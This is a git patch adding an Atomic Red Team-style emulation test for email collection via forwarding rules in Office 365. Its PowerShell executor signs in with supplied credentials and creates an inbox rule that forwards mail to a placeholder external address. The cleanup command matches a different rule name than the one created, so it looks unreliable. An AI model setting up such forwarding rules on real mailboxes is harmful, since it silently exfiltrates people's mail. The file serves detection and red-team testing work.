From ef832dc7aaf2c0bf0d6c9421b3fc98d1fae312a3 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld <tvjust@gmail.com>
Date: Wed, 4 Jan 2023 16:25:29 -0500
Subject: [PATCH] Create T1114.003.yaml

---
 atomics/T1114.003/T1114.003.yaml | 46 ++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 atomics/T1114.003/T1114.003.yaml

diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
new file mode 100644
index 00000000..c9002d1a
--- /dev/null
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -0,0 +1,46 @@
+attack_technique: T1114.003
+display_name: 'Email Collection: Email Forwarding Rule'
+atomic_tests:
+- name: Office365 - Email Forwarding
+  auto_generated_guid: 
+  description: |
+    Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+  supported_platforms:
+  - office-365
+  input_arguments:
+    username:
+      description: office-365 username
+      type: String
+      default: null
+    password:
+      description: office-365 password
+      type: String
+      default: null
+    rule_name:
+      description: email rule name
+      type: String
+      default: "Atomic Red Team Email Rule"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license. 
+    prereq_command: |
+      $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name ExchangeOnlineManagement         
+      Import-Module ExchangeOnlineManagement
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+    cleanup_command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+    name: powershell
+    elevation_required: false
\ No newline at end of file